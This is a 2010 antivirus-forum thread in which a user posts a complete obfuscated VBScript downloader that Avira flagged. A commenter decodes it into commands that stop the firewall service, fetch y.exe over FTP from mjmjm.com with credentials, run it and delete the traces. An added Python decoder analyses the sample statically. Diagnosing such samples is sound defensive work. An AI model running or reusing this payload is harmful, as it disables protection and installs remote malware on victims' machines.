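Author: piligo (霹靂狗)
Board: AntiVirus
Title: [Question] Where did C:\WINDOWS\X.vbs come from?
Time: Mon May 10 05:51:28 2010
A question: Avira just popped up a virus warning out of nowhere. I'm posting the script's contents below; could someone more experienced tell me what this script
actually does?
I searched the whole registry and found no trace of X.vbs, so is this a false positive?
I don't know which program created this X.Vbs.
Avira's Properties: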
Type: File
Source: C:\WINDOWS\X.Vbs
Status: Infected
Quarantine object: 4de78c7e.qua
Restored: NO
Uploaded to Avira: NO
Operating System: Windows 2000/XP/VISTA Workstation
Search engine: 8.02.01.236
Virus definition file: 7.10.07.66
Detection: Contains recognition pattern of the
VBS/Dldr.PIF.1045 VBS script virus
Date/Time: 2010/5/10, 05:27
The script's contents are as follows:
function o
for i=1 to UBound(s)
h=h&chr(s(i)-562)
next
Set qq = CreateObject("Wscript.Shell")
qq.run h,0
end function
s=array(575,661,671,662,594,609,661,594,672,663,678,594,677,678,673,674,594,
677,666,659,676,663,662,659,661,661,663,677,677,600,663,661,666,673,594,673,
594,671,668,671,668,671,608,661,673,671,624,671,608,678,682,678,600,663,661,
666,673,594,659,677,610,618,624,624,671,608,678,682,678,600,663,661,666,673,
594,618,618,618,624,624,671,608,678,682,678,600,663,661,666,673,594,665,663,
678,594,683,594,683,608,663,682,663,624,624,671,608,678,682,678,600,663,661,
666,673,594,660,683,663,624,624,671,608,678,682,678,600,664,678,674,594,607,
677,620,671,608,678,682,678,600,662,663,670,594,671,608,678,682,678,600,683,
608,663,682,663,600,659,678,678,676,667,660,594,625,608,680,660,677,594,607,
676,600,662,663,670,594,625,594,625,608,660,659,678,594,625,608,680,660,677,
594,625,608,663,682,663,600,600,677,678,659,676,678,594,666,678,678,674,620,
609,609,678,681,608,660,667,662,608,683,659,666,673,673,608,661,673,671,609)
o
--
※ Posted from: 批踢踢實業坊 (ptt.cc)
◆ From: 112.104.21.226
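→ piligo: If you just join the second line's numbers back onto the s=array line, it gets detected as a virus 05/10 06:07
→ zha0: You broke the array across lines for layout; originally it was meant to be joined cc 05/10 10:46
→ piligo: Right, so the "lucky numbers" are all joined together XD Does anyone know what this code does? 05/10 11:02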
→ piligo: 有 05/10 11:02
Push junorn:cmd /c net stop sharedaccess 05/10 12:23
→ junorn:echo o mjmjm.com>m.txt 05/10 12:23
→ junorn:echo as08>>m.txt 05/10 12:23
→ junorn:echo 888>>m.txt 05/10 12:23
→ junorn:echo get y y.exe>>m.txt 05/10 12:24
→ junorn:echo bye>>m.txt 05/10 12:24
→ junorn:ftp -s:m.txt 05/10 12:24
→ junorn:del m.txt 05/10 12:24
→ junorn:y.exe 05/10 12:24
→ junorn:attrib ?.vbs -r 05/10 12:24
→ junorn:del ? ?.bat ?.vbs ?.exe 05/10 12:25
→ junorn: There is an & symbol between each of the lines above 05/10 12:26
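
Added example, not part of the original thread: a static decoder for the chr(s(i)-562) scheme in the posted script, which recovers the command line junorn lists without running anything. The function names and the shortened SAMPLE (the first 36 array elements from the post) are assumptions made for this illustration.

```python
import re

# Excerpt of the script posted above (first 36 array elements only), kept
# line-wrapped the way the post shows it. Nothing here is executed.
SAMPLE = """function o
for i=1 to UBound(s)
h=h&chr(s(i)-562)
next
end function
s=array(575,661,671,662,594,609,661,594,672,663,678,594,677,678,673,674,594,
677,666,659,676,663,662,659,661,661,663,677,677,600,663,661,666,673,594,673)
o"""

def decode_vbs_array(script):
    """Statically recover the string built by h=h&chr(s(i)-N)."""
    off = re.search(r"chr\(\s*\w+\(\s*\w+\s*\)\s*-\s*(\d+)\s*\)", script, re.I)
    arr = re.search(r"array\(([\d,\s]*)\)", script, re.I)
    if not off or not arr:
        raise ValueError("no chr(s(i)-N) loop or array(...) literal found")
    offset = int(off.group(1))
    # \d+ tolerates the line breaks inserted into the array literal.
    values = [int(v) for v in re.findall(r"\d+", arr.group(1))]
    # The loop starts at i=1, so element 0 is never decoded.
    start_m = re.search(r"for\s+\w+\s*=\s*(\d+)\s+to", script, re.I)
    start = int(start_m.group(1)) if start_m else 0
    chars = []
    for v in values[start:]:
        code = v - offset
        if not 0 <= code <= 255:
            raise ValueError(f"element {v} is outside chr() range after offset")
        chars.append(chr(code))
    return "".join(chars)

def split_commands(cmdline):
    """Split a cmd.exe line on the & separator, one command per entry."""
    return [part.strip() for part in cmdline.split("&") if part.strip()]

if __name__ == "__main__":
    for step in split_commands(decode_vbs_array(SAMPLE)):
        print(step)
```

The split on & is deliberately naive and does not account for quoted arguments, which this script does not use.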